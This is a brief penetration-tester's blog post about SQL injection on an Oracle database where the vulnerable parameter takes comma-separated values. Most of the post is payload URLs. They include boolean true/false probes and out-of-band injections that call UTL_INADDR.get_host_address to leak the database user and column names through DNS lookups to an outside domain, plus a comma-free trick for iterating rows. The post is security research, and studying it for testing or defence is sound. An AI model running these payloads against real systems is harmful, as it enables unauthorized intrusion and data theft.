Recently i came across a SQL Injection against oracle database, where the vulnerable parameter was taking comma separated input.
Thus Valid input will look like:- index.do?id=1,200
And it was easier to confirm that its vulnerable to sql injection by making true and false responses:-
True response:- index.do?id=1,200 and 1=1
False Response:- index.do?id=1,200 and 1=2
This way i could carry out the bind sql injection, but then i tried to get data through out of band channeling and that worked too:-
example:-index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(
(SELECT+user+from+dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null
However, the problem arrived when i had to get data by iterating through rows. In order, to iterate through rows i use the following syntax:-
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;
But As this application was taking comma separated values, this comma resulted in my query being structured in some other way and the application returned error.
A solution to this is to use the query like:-
index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(
(SELECT+column_name+from+all_tab_columns+where+rownum<2+and+
column_name+not+in
(select+column_name+from+all_tab_columns where+rownum<4 ))||
'.a.notsosecure.com')+FROM+dual)+is+not+null
By increasing the rownum number (in bold) iteration could be achieved. However, as this number increases the backend queries become more and more cpu intensive. I still could not do union select query as the original query select more than one column and i could not figure out a way to do union select without entering comma.
----
A good resource for pentesting oracle Application server can be found here:-
Oracle Application Scanner(OAPscan) is also a very handy tool.
---